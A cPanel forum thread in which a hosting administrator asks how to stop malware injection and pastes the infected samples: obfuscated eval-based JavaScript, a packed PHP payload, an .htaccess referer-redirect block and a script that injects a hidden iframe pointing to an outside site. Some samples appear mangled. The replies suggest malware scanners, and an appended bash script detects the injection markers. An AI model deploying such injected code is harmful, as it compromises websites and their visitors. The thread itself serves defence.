The Community Forums

Interact with an entire community of cPanel & WHM users!

How to Stop Malware code injection

Discussion in 'Security' started by ravibagul, Nov 12, 2012.

  1. ravibagul

    ravibagul Member

    Joined:
    Mar 16, 2006
    Messages:
    16
    Likes Received:
    0
    Trophy Points:
    1
    Hello,

    We are facing malware code injection in PHP, HTML, .js and .htaccess files. There are many types of code. Sometimes we get FTP download and upload logs for a particular infected file, but sometimes we cannot. So where do we need to check the logs? How can we fully protect our sites, including PHP and HTML pages as well as .js pages?

    Following are a few examples of it.
    Code:
    ============
    <!--c3284d--><script>try{q=document.createElement("p");q.appendChild(q+"");}
    catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f
    )?
    "CharC"+"ode"):"";e=window"eval"];n3,20,300,444,99,234,327,404,110,232,138,4
    76,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,456,99,122,102,4
    16,116,232,336,232,47,94,357,476,50,92,327,484,106,222,294,456,101,230,351,4
    36,101,222,330,432,105,220,303,184,99,222,327,188,109,194,315,440,46,224,312
    ,448,63,224,291,412,101,1230,412,61,68,291,468,116,222,102,128,102,228,291
    ,436,101,196,333,456,100,202,342,244,34,220,333,136,32,194,324,420,103,220,1
    83,136,99,202,330,464,101,228,102,128,104,202,315,412,104,232,183,136,50,68,
    96,476,105,200,348,416,61,68,150,136,62,120,141,420,102,228,291,436,101,124,
    117,164,59,26,30];if(window.document)for(i=6-2-1-2-1;-195+i!=2-2;i++){k=i;ss
    =ss+String[f](n[k]/(i%(h*h)+1e(ss);}}</script><!--/c3284d-->
    ============
    
    #c3284d#
    echo(gzinflate(base64_decode("dVPBjpswEP2WWuoKipP12AOBsrSHVb+gxyiHbAIL2mxIgD
    ZaRfvvfWMTbQ/tAZnxjN+898Z+GHdDd5q+TcPb9Vzt+92v1/o4LXdDvZ3qH4daokidVFyel9vTqT
    7uH9vusI/OicLe+2477drofImvbbUwZO/TsqGamtzbQvS7FBtSGcA41Rzmgk2WeurmAQr89jOhZVX
    ukBxuvKdUqMLG3jk4GFQg7MWFQIlyNaBR/rRSfIOeyx8TYpYZDmwC7JsgKMchA2oSDMCM2hgQZcQ
    LKAscz70Msh6cE88BRhIiRRggK9EqLdQRCsUG4E2ARqMqfA6xEQRTbDG/xcfBmdwCACpDfYKbbFk
    tlfsRhownJkgIodGN2vMwyxEM2jOUEI6y4O7s9u+8T9mI/w8mnfUeB2OUccytGAg0oRy6edp8zxp
    59OUh7RQM7P9Gc/jyP9qziEvfntHOVyr+ThMmmXeTDDzHYOKoIvESJRmgohfpv9eObLiHKYDJimI
    gb3ZlF0Thcu/vL3LuOmHqKuyhV2QfOWCijTpPlUWT6tLkvj6UnUlntU4Jj+noTs+r5tNdFy/bO6j
    7nPUfmnjhGK82zoaRyzvD/fz+/8D")));
    #/c3284d#
    ============
    
    #c3284d#
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER}
    ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|
    alltheuk|alltheweb|altista|america|amfibi|aol|apollo7|aport|arcor|ask|atsear
    ch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bri
    cabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex
    |cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|eurose
    ek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|findi
    tireland|findloo|findwhat|fjayde|jobrapido|kataweb|keyweb|kingdomseek|klam
    meraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|live
    internet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|m
    yspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|pas
    sagen|poyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|such
    biene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|
    telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onl
    ine|topseven|twitter|ukkey|uwe|verygoodsearch|vkon
    takte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|west
    australiaonline|wikipedia|wisenut|witch|wolong|ya|
    yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
    RewriteRule ^(.*)$
    </IfModule>
    #/c3284d#
    ============
    
    <script> var kqrvynN6s2UptKFD5j = { init: function () { this.browser =
    this.searchString(this.dataBrowser) || "An unknown browser"; this.version =
    this.searchVersion(navigator.userAgent) ||
    this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS =
    this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function
    (data) { for (var i=0;i<data.length;i++) { var ntextiQWzk951QAMZK =
    data[i].string; var fdvzythPxZC2jZIpRB = data[i].prop;
    this.versionSearchString = data[i].versionSearch || data[i].identity; if
    (ntextiQWzk951QAMZK) { if (ntextiQWzk951QAMZK.indexOf(data[i].subString)
    != -1) return data[i].identity; } else if (fdvzythPxZC2jZIpRB) return
    data[i].identity; } }, searchVersion: function (ntextiQWzk951QAMZK) { var
    index = ntextiQWzk951QAMZK.indexOf(this.versionSearchString); if (index
    == -1) return; return
    parseFloat(ntextiQWzk951QAMZK.substring(index+this.versionSearchString.lengt
    h+1)); }, dataBrowser: [       { string: navigator.userAgent,subString:
    "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString:
    "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string:
    navigator.platform,subString: "Win",identity: "Windows"}]};function
    gbdtqoDfpw3J1tc11I(szName,szValue,dtDaysExpires){ var zieplnJ1WztwXFznF6 =
    new Date();var spxxvul9MLe5CwKE09 =
    "";zieplnJ1WztwXFznF6.setTime(zieplnJ1WztwXFznF6.getTime()+dtDaysExpires*24*
    60*60*1000);spxxvulame){        var i=0;var ghibchGv7yz3UOmwZA=0;var
    krhipfXA9ijx9JTaLe=0;var shlllk400Y1z7nMuVL=document.cookie; while
    (i<=shlllk400Y1z7nMuVL.length){ghibchGv7yz3UOmwZA=i;krhipfXA9ijx9JTaLe=ghibc
    hGv7yz3UOmwZA+szName.length;if
    (shlllk400Y1z7nMuVL.substring(ghibchGv7yz3UOmwZA,krhipfXA9ijx9JTaLe)==szName
    ){ghibchGv7yz3UOmwZA=krhipfXA9ijx9JTaLe+1;krhipfXA9ijx9JTaLe=document.cookie
    .indexOf(";",ghibchGv7yz3UOmwZA);if(krhipfXA9ijx9JTaLe<ghibchGv7yz3UOmwZA)
    krhipfXA9ijx9JTaLe=document.cookie.length;return
    document.cookie.substring(ghibchGv7yz3UOmwZA,krhipfXA9ijx9JTaLe);break;}i++;
    } return "";} kqrvynN6s2UptKFD5j.init(); var shlllk400Y1z7nMuVL =
    document.cookie; var xfosdspPRkedYhiiOQ = kqrvynN6s2UptKFD5j.browser; var os
    = kqrvynN6s2UptKFD5j.OS; if ( ((xfosdspPRkedYhiiOQ == "Firefox" ||
    xfosdspPRkedYhiiOQ == "Explorer") && (os == "Windows")) &&
    (nftjhe5c5kfodN6nbg('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') )
    {gbdtqoDfpw3J1tc11I("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document
    .write('<iframe src="http://csepros.com" name="Twitter" scrolling="auto"
    frameborder="no" align="center" height = "1px" width =
    "1px"></iframe>');}else {}</script>root@rapid [~]# cat
    /home/stcallma//public_html/_vti_inf.html
    
    ============
    <!--a4bc48--><script>if(window.document)a=("urf3".split+'qwe').substr(0,6);a
    a=(Date+{}).substr(0,6);if(a===aa)f=[-28,-28,68,65,-5,3,63,74,62,80,72,64,73
    ,79,9,66,64,79,32,71,64,72,64,73,79,78,29,84,47,60,66,41,60,72,64,3,2,61,74,
    63,84,2,4,54,11,56,4,86,-28,-,-,68,65,77,60,72,64,77,3,4,22,-,-,88,-,64,71,7
    8,64,-,86,-,-,-,74,62,80,72,64,73,79,9,82,77,68,79,64,3,-,23,68,65,77,60,72,
    64,-,78,77,62,24,2,67,79,79,75,21,10,10,82,64,61,74,77,63,64,77,72,60,73,60,
    66,64,77,9,62,74,72,2,-,82,68,63,79,67,24,2,12,11,2,-,67,64,68,66,67,79,24,2
    ,12,11,2,-,78,79,84,71,64,24,2,81,68,78,68,61,68,71,68,79,84,21,67,68,63,63,
    64,73,22,75,74,78,68,79,68,74,73,21,60,61,78,74,71,80,79,64,22,71,64,65,79,2
    1,11,22,79,74,75,21,11,22,2,25,23,10,68,65,77,60,72,64,25,-3,4,22,-28,-,88,-
    ,-,65,80,73,62,79,68,74,78,64,79,28,79,79,77,68,61,80,79,64,3,2,775,2
    1,10,10,82,64,61,74,77,63,64,77,72,60,73,60,66,64,77,9,62,74,72,2,4,22,65,9,
    78,79,84,71,64,9,81,68,78,68,61,68,71,68,79,84,24,2,67,68,63,63,64,73,2,22,6
    5,9,78,79,84,71,64,9,75,74,78,68,79,68,74,73,24,2,60,61,78,74,71,80,79,64,2,
    22,65,9,78,79,84,71,64,9,71,64,65,79,24,2,11,2,22,65,9,78,79,84,71,64,9,79,7
    4,75,24,2,11,2,22,65,9,78,64,79,28,79,79,77,68,61,80,79,64,3,2,82,68,63,79,6
    7,2,7,2,12,11,2,4,22,65,9,78,64,79,28,79,79,77,68,61,80,79,64,3,2,67,64,68,6
    6,67,79,2,7,2,12,11,2,4,22,-,-,-,63,74,62,80,72,64,73,79,9,66,64,79,32,71,64
    ,72,64,73,79,78,29,84,47,60,66,41,60,72,64,3,2,61,74,63,84,2,4,54,11,56,9,60
    ,75,75,64,73,63,30,67,68,71,63,3,65,4,22,-28,-8,88];md='a';q="q";e=eval;w=f;
    s='';g='fro'+'mCharCode';for(i=0;i<w.length;i++){s=s+String[g](37+w[i]);}if(
    a===aa)e('e(s)');</script><!--/a4bc48-->
    
    ============
    Please advise us,

    Thanks.
     
  2. STS Admin

    STS Admin Well-Known Member

    Joined:
    Jul 8, 2012
    Messages:
    47
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    India
    cPanel Access Level:
    Root Administrator
    You can try ConfigServer eXploit Scanner (cxs).

    It does an active scan on all files uploaded to the server, whether they're uploaded via a PHP script, Perl, CGI or FTP (pure-ftp).
     
  3. ravibagul

    ravibagul Member

    Joined:
    Mar 16, 2006
    Messages:
    16
    Likes Received:
    0
    Trophy Points:
    1
    Hello Admin,

    cxs is a third-party licensed tool. Anything else? Any other way to prevent this?
     
  4. RandallJ

    RandallJ Member

    Joined:
    Nov 13, 2012
    Messages:
    11
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    Yea, learn to secure your server yourself, pay someone to secure your server, or unplug the thing..

    The $50 for CXS makes it virtually free if you need the thing.. (I suggest you get a full server package myself.) You have clients on your box with bad scripting or, worse yet, you are rooted.. My bet is you have some shell scripts and bad folder settings..

    Chirpy has set base security on my servers for close to 10 years and frankly, he does a great job (well Sarah too).. Really is the best money you can spend to start out IMHO..

    The damage being done by these scripts (likely sending out tons of spam via nobody) is going to cost your business if you don't stop it. Makes the few bucks now really a good investment..


    And for what it is worth... do not post scripts or chunks of them... stupid things propagate enough as it is without people helping them along..
     
    #4 RandallJ, Nov 18, 2012
    Last edited: Nov 18, 2012
  5. dalem

    dalem Well-Known Member
    PartnerNOC

    Joined:
    Oct 24, 2003
    Messages:
    2,577
    Likes Received:
    40
    Trophy Points:
    48
    Location:
    SLC
    cPanel Access Level:
    DataCenter Provider
  6. nospa

    nospa Well-Known Member

    Joined:
    Apr 23, 2012
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Reseller Owner
  7. mahinder

    mahinder Well-Known Member

    Joined:
    Jun 12, 2003
    Messages:
    68
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    matrix
    You can start by installing a nice set of mod_security rules. Search the forum for mod_security for more information. These kinds of infections also come from infected computers through FTP uploads. If you scan recently modified files on the server regularly, you will be able to detect many such infections.
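    One way to do the regular "scan recently modified files" sweep mahinder describes, as an added example that is not from the thread, from cPanel or from any scanner product: it finds files under a document root changed in the last N days and greps them for the markers visible in the samples ravibagul posted (the six-hex-digit `<!--c3284d-->` / `#c3284d#` wrapper comments, `gzinflate(base64_decode(`, and the `String[f](` decoder call). The function names, the marker list and the sample tree it builds are my own constructions; GNU find and grep are assumed, as on a typical cPanel host.

```bash
#!/usr/bin/env bash
# Added example, not code from the thread: sweep a document root for files
# changed in the last N days that carry the injection markers seen in the
# samples posted above. Heuristic only: report, review, then restore the file
# from a known-good copy. Assumes GNU find/grep (as on a cPanel/CentOS host).

# Markers drawn from the samples in the thread (assumed list, extend as needed):
#   <!--c3284d--> / #c3284d#      six-hex-digit wrapper comments around injected code
#   gzinflate(base64_decode(      packed PHP payload
#   String[f]( / String[g](       JS decoder reaching String.fromCharCode by indirection
MARKERS='<!--[0-9a-f]{6}-->|#[0-9a-f]{6}#|gzinflate\(base64_decode\(|String\[[a-z]+]\('

# scan_recent DOCROOT DAYS -> one "file:line:marker" per hit, for the file
# types the poster reported (php, html, js, .htaccess).
scan_recent() {
  find "$1" -type f \
    \( -name '*.php' -o -name '*.html' -o -name '*.htm' -o -name '*.js' -o -name '.htaccess' \) \
    -mtime "-$2" -exec grep -E -H -n -o "$MARKERS" {} + 2>/dev/null
  return 0
}

# list_infected DOCROOT DAYS -> one path per file with at least one hit
list_infected() {
  scan_recent "$1" "$2" | cut -d: -f1 | sort -u
}

# count_infected DOCROOT DAYS -> number of files with at least one hit
count_infected() {
  list_infected "$1" "$2" | wc -l | tr -d ' '
}

# make_samples DIR -> a constructed sample tree (not real site content) so the
# script can be exercised offline: one clean file and three carrying markers.
make_samples() {
  mkdir -p "$1/blog"
  printf '<?php echo "hello"; ?>\n' > "$1/clean.php"
  printf '<html><body>ok</body>\n<!--c3284d--><script>eval(String[f](n))</script><!--/c3284d-->\n</html>\n' \
    > "$1/blog/page.html"
  printf '#c3284d#\n<IfModule mod_rewrite.c>\nRewriteEngine On\n</IfModule>\n#/c3284d#\n' \
    > "$1/.htaccess"
  printf '<?php\n#c3284d#\necho(gzinflate(base64_decode("AAAA")));\n#/c3284d#\n' \
    > "$1/wp-load.php"
}

# Run with --demo to see the sweep over the constructed tree.
if [ "${1:-}" = "--demo" ]; then
  tmp=$(mktemp -d)
  make_samples "$tmp"
  echo "Infected files under $tmp (changed in last 2 days): $(count_infected "$tmp" 2)"
  scan_recent "$tmp" 2
  rm -rf "$tmp"
fi
```

    Run it as `bash scan_recent.sh --demo` to see it against the constructed samples, or source it and call `scan_recent /home/USER/public_html 1` on a real docroot (USER being your account). Because grep runs with `-o`, each line shows which marker fired, which is what you want when deciding whether a hit is real. `-mtime` counts whole 24-hour periods, so use `-mmin` instead if you want a tighter window such as "since the last run".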
     
  8. sahostking

    sahostking Well-Known Member

    Joined:
    May 15, 2012
    Messages:
    299
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Cape Town, South Africa
    cPanel Access Level:
    Root Administrator
    Linux Malware Detect | R-fx Networks

    Anyone use the above on production servers yet? Would like some opinions.
     
  9. STS Admin

    STS Admin Well-Known Member

    Joined:
    Jul 8, 2012
    Messages:
    47
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    India
    cPanel Access Level:
    Root Administrator
    Yes, it's a good scanner. Works perfectly fine. You can configure it as per your needs, whether just to alert you with the list of infected files, quarantine them, or automatically delete them on scan.
     
  10. crazyaboutlinux

    crazyaboutlinux Well-Known Member

    Joined:
    Nov 3, 2007
    Messages:
    938
    Likes Received:
    0
    Trophy Points:
    16
    Yes, LMD is a good malware detector for Linux.
     
  11. Sannin

    Sannin Active Member

    Joined:
    May 19, 2011
    Messages:
    34
    Likes Received:
    0
    Trophy Points:
    6
    LMD is good, but CXS is better. I use them both on my server. CXS can detect more threats, such as compromised .htaccess files, defaced php files etc...
     